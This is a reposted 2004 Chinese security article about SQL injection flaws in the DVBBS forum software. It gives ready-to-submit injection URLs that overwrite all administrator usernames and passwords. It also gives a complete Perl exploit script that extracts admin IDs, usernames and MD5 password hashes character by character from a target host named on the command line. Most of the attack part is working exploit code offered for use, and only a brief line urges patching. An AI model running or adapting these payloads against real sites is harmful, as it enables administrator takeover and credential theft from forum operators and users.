为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

绝对背后的微笑-再谈DVBBS漏洞

2004-9-29 20:05| 投稿: security

摘要: Envymask的睿智帮我解决了很多问题,尽管是兄弟,我还是要说谢谢。很吃惊地看到了DVBBS发布的安全补丁,原来有人提醒了作者程序所存在的一类漏洞。可以看出,作者对DVBBS做了全面检测,并且在消除...
Envymask的睿智帮我解决了很多问题,尽管是兄弟,我还是要说谢谢。很吃惊地看到了DVBBS发布的安全补丁,原来有人提醒了作者程序所存在的一类漏洞。可以看出,作者对DVBBS做了全面检测,并且在消除那一类漏洞的同时,也顺带消除了其他几个安全隐患。看到自己曾耗费数小时换来的“劳动成果”被作者解决,心中有点不快。有人、文章错误地认为:动网即使存在漏洞,也只能真正威胁MSSQL版;而ACCESS版的用户敏感信息MD5加密和后台管理的SESSION+COOKIE验证则让大家认为它牢不可破:“顶多让你得到MD5加密后的密码,你还能做什么呢?”、“我们只有暴力破解”、“动网已经是非常安全的程序了”...在一个失落的清晨,我偶然发现了这位亲爱的朋友,她静静地站在绝对的背后,微笑...因此,本文展示如何攻破“所谓安全”的ACCESS版DVBBS;由于MSSQL版的漏洞利用简单乏味,拒绝介绍。另外,请相关朋友速打补丁。攻击分两步,首先得到管理员MD5加密的敏感信息,接着在此基础上更改后台管理员密码。一:得到任意用户MD5加密的敏感信息可以利用 logout.asp、messanger.asp、myfile.asp...等一大批文件所存在的Sql Injection漏洞达到目的。这些漏洞文件中logout.asp让我稍感新意,选它来说明问题:logout.asp:/--------------------------------------------------------------------------    dim activeuser    membername=request.cookies("aspsky")("username")    if session("userid")"" then    activeuser="delete from online where id="&session("userid")    Conn.Execute activeuser    end if    if membername"" then    activeuser="delete from online where username='"&membername&"'"    Conn.Execute activeuser    end if    Response.Cookies("aspsky").path=cookiepath    Response.Cookies("aspsky")("username")=""    Response.Cookies("aspsky")("password")=""    Response.Cookies("aspsky")("userclass")=""    Response.Cookies("aspsky")("userid")=""    Response.Cookies("aspsky")("userhidden")=""    Response.Cookies("aspsky")("usercookies")=""    session("userid")=""    conn.close    set conn=nothing    response.redirect("index.asp")%>/--------------------------------------------------------------------------问题语句:    activeuser="delete from online where username='"&membername&"'"很多人会问:这也能利用?能!步骤:1:注册一用户并登陆;2:在COOKIE中构造membername请求logout.asp,以图程序所执行的SQL查询语句中包含我们利用逻辑关系添加的子语句;3:构造参数请求主页面,如返回页面包含用户注册名,重复第 2 步;4:得到敏感信息。测试程序附后。二:闯入后台管理我们已经得到管理员MD5加密的敏感信息,现在可以利用COOKIE欺骗可以在前台执行管理员操作。如果你依然坚持暴力破解,并认为这很有趣,你可以停止阅读本文了。鄙视暴力破解。不是说不现实,而是说这很乏味。admin_recycle.asp/--------------------------------------------------------------------------...topicid=request("topicid")if request("action")"清空回收站" then    if topicid="" or isnull(topicid) then        Errmsg=Errmsg+""+"请选择相关帖子后进行操作。"        Founderr=true    end ifend ifif request("tablename")="topic" then    tablename="topic"elseif instr(request("tablename"),"bbs")>0 then    tablename=request("tablename")else    Errmsg=Errmsg+""+"错误的系统参数!"    Founderr=trueend ifif not master then    Errmsg=Errmsg+""+"您不是系统管理员或者您还没有登陆。"    Founderr=trueend if...'还原回收站内容sub redel()dim tempnum,todaynumif instr(tablename,"bbs")>0 then    sql="update "&tablename&" set locktopic=0 where Announceid in ("&TopicID&")"    conn.execute(sql).../--------------------------------------------------------------------------问题:1:未采用SESSION认证2:topicid没有过滤3:仅要求tablename包含bbs而不采取其他任何过滤(目前依然未修正)Tablename和TopicID前后呼应,真是天合之作。提交http://www.psych.com/d6/admin_recycle.asp?action=还原&topicid='%20where%20id%20in%20(9&tablename=admin%20set%20[password]='ef7813118e77b0ee',lastloginip='bbs实际执行的是update admin set [password]='ef7813118e77b0ee', lastloginip='bbs set locktopic=0 where Announceid in (' where id in (9)这样,ID为 9 的后台管理员的密码就被修改为 ilikecat (ef7813118e77b0ee)。提交如上URL后,页面会返回出错提示。这是因为后面的SQL语句有语法错误,别管它,我们要求执行的语句已经在它之前“正确”执行了。注意:前台管理员和后台管理员是一一对应的,弄错了不能正确登陆后台。为了省事,你可以:http://www.psych.com/d6/admin_recycle.asp?action=还原&topicid='%20where%20(1=1&tablename=admin%20set%20[password]='ef7813118e77b0ee',lastloginip='bbs所有后台管理员密码修改为 ilikecat (ef7813118e77b0ee)http://www.psych.com/d6/admin_recycle.asp?action=还原&topicid='%20where%20(1=1&tablename=admin%20set%20username='catlikeme',lastloginip='bbs所有后台管理员用户名修改为 catlikeme 当然,最好不要无聊到把所有注册用户的帐号和密码全修改了。OK,本地COOKIE做些处理后,劳请使用 catlikeme/ilikecat 登陆后台进行“管理”。/--------------------[获取任意用户MD5加密信息的测试程序:#!/usr/bin/perl#Codz By PsKey#Exploit of DVBBS's logout.asp#-------------------------------------------------------------------------- #  本脚本针对动网论坛logout.asp文件缺陷而写,可以推算出所有用户#  MD5加密密码;另外可以自动破解后台管理员ID、username、password#  脚本参照最新版本编写,若低版本出现不能用的情况,请自行修改程序#  脚本利用方法:#  1:在目标论坛以 ilikecat/catlikeme 注册一用户,并得到此用户的 userid#  2:再另注册一任意用户(此步不可少)#  3:运行脚本,按帮助输入命令参数#  如果是MSSQL版,请把这段糟糕的脚本扔到一边#--------------------------------------------------------------------------$|=1;use Socket;use Getopt::Std;getopt('hpwium');print "\n             ===================================================\n";print "                       Exploit of DVBBS's logout.asp\n";print "                     Codz By PsKey     \n";print "                       www.isgrey.com && c4st.51.net              \n";print "                       Thanx Envymask            \n";print "             ===================================================\n";&usage unless ( defined($opt_h) && defined($opt_w) && defined($opt_i) && defined($opt_m));$host=$opt_h;$port=$opt_p||80;$path=$opt_w;$userid=$opt_i;$user=$opt_u;$mode=$opt_m;if ($opt_m eq "p") {&usage unless defined($opt_u);print "\nPlease wait...\n\n";for ($j=1;$j@dic1=(0..9);@dic2=(a..f);@dic=(@dic1,@dic2);&first;for ($i=0;$iprint "$dic[$i]";$key=$pws.$dic[$i];$target = "ilikecat'%20and%20exists%20(select%20UserID%20from%20[user]%20where%20UserName='$user'%20and%20left(UserPassword,$j)='$key')%20and%20'1'='1";&second;if ("@in" !~ /ilikecat/)  {    $th=$j.th;    print "\n\/\/------------The $th word of the password is $dic[$i]";    $pws=$pws.$dic[$i];    last;}}}print "\n\nSuccessful,the full password of $user is $pws.\n";}elsif ($opt_m eq "b") { #Crack IDprint "\n\#\#\#\#\#\#\#\#\#\#\#Start cracking admin's id...";&first;for ($i=0;$i$target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$i)%20and%20'1'='1";&second;if ("@in" !~ /ilikecat/)  {    print "\n--------->>There is one admin's id $i";    push (@id,$i);    &first;}}print "\n\#\#\#\#\#\#\#\#\#\#\#End cracking admin's id...\n";sleep(2);#Crack the length of admin's usernameprint "\n\#\#\#\#\#\#\#\#\#\#\#Start Cracking the length of admin's username...\n";for ($j=0;$jprint "  \|\-\>cracking username's length which id is $id[$j] ...";&first;for ($i=0;$i$target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20len(username)=$i%20and%20id=$id[$j])%20and%20'1'='1";&second;if ("@in" !~ /ilikecat/)  {    print "\n--------->>The length of $id[$j] is $i";    push (@len,$i);    &first;    last;}}}print "\n\#\#\#\#\#\#\#\#\#\#\#End Cracking the length of admin's username...\n";sleep(2);#Crack admin's usernameprint "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's username...\n";@dic1=(0..9);@dic2=(a..z);@dic=(@dic1,@dic2);for ($j=0;$j$pws="";print "  \|\-\>cracking username which id is $id[$j] ...";  OUTER: for ($k=1;$k  &first;  USERNAME: for ($i=0;$i  print "$dic[$i].";  $key=$pws.$dic[$i];  $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(username,$k)='$key')%20and%20'1'='1";  &second;  if ("@in" !~ /ilikecat/)  {    $th=$k.th;    print "\n--------->>The $th word of $id[$j] username is $dic[$i]";    $pws=$pws.$dic[$i];    last USERNAME;        }  if ($dic[$i] eq "z") {    print "\ni can't crack this admin's name,maybe it is chinese.\n";    push (@user,"\?");    last OUTER;        }      }    }  push (@user,$pws);  print "\n========>>The username is $pws which id is $id[$j]\n";}print "\n\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's username...\n";sleep(2);#Crack admin's passwordprint "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmin's password...\n";@dic1=(0..9);@dic2=(a..f);@dic=(@dic1,@dic2);for ($j=0;$j$pws="";print "  \|\-\>cracking password which id is $id[$j] ...";  for ($k=1;$k  &first;  PASSWORD: for ($i=0;$i  print "$dic[$i].";  $key=$pws.$dic[$i];  $target = "ilikecat'%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(password,$k)='$key')%20and%20'1'='1";  &second;  if ("@in" !~ /ilikecat/)  {    $th=$k.th;    print "\n--------->>The $th word of $id[$j] password is $dic[$i]";    $pws=$pws.$dic[$i];    last PASSWORD;        }      }    }  push (@pass,$pws);  print "\n\n========>>The password is $pws which id is $id[$j]\n\n";}print "\#\#\#\#\#\#\#\#\#\#\#End Crackadmin's password...\n\n";print "We got them now:\n";printf("%-4s %-20s %-16s\n",ID,UserName,PassWord);for ($i=0;$iprintf("%-4d %-20s %-16s\n",$id[$i],$user[$i],$pass[$i]);}}else {&usage;}sub first {$str="username=ilikecat&password=catlikeme&CookieDate=1";$len=length($str);$req = "GET $path/login.asp?action=chk&username=ilikecat&password=catlikeme HTTP/1.1\n".       "Referer: http://$host$path/login.asp\n".       "Host: $host\n".       "Content-Length: $len\n".       "Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show;upNum=0\n".       "\n".       "$str\n\n";print "\n.";sendraw($req);$req0 = "GET $path/index.asp HTTP/1.0\n".        "Referer: http://$host$path/index.asp\n".        "Host: $host\n".        "Cookie: aspsky=userid=$userid&usercookies=0&userhidden=2&password=aac9ac496fa5ea8e&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=ilikecat; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";print ".\n";sendraw($req0);}sub second {$req1 = "GET $path/logout.asp HTTP/1.0\n".        "Host: $host\n".        "Cookie: aspsky=userid=$userid&usercookies=1&userhidden=2&username=$target; iscookies=0; BoardList=BoardID=Show; \n\n";print ".";@res = sendraw($req1);$req2 = "GET $path/index.asp?action=show HTTP/1.0\n".        "Referer: http://$host$path/index.asp?action=show \n".        "Host: $host\n".        "Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";print ".";@in = sendraw($req2);}sub usage {print qq~Usage: $0 -h [-p ] -w -i -m [-u ]    -h   =hostname you want to attack    -p   =port,80 default    -w   =the web path such as "/dvbbs"    -i   =the userid of ilikecat    -m   =only two choice,b and p(This option need -u)    -u   =the user you want to crackEg: 1.Crack proscenium      $0 -h www.target.com -p 80 -w /dvbbs -i 2 -m p -u admin      2.Crack background     $0 -h www.target.com -p 80 -w /dvbbs -i 2 -m b~;exit;}sub sendraw {     my ($req) = @_;     my $target;     $target = inet_aton($host) || die("inet_aton problems\n");     socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");     if(connect(S,pack "SnA4x8",2,$port,$target)){         select(S);     $| = 1;         print $req;     my @res = ;         select(STDOUT);    close(S);         return @res;    }    else {     die("Can't connect...\n");     }}

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部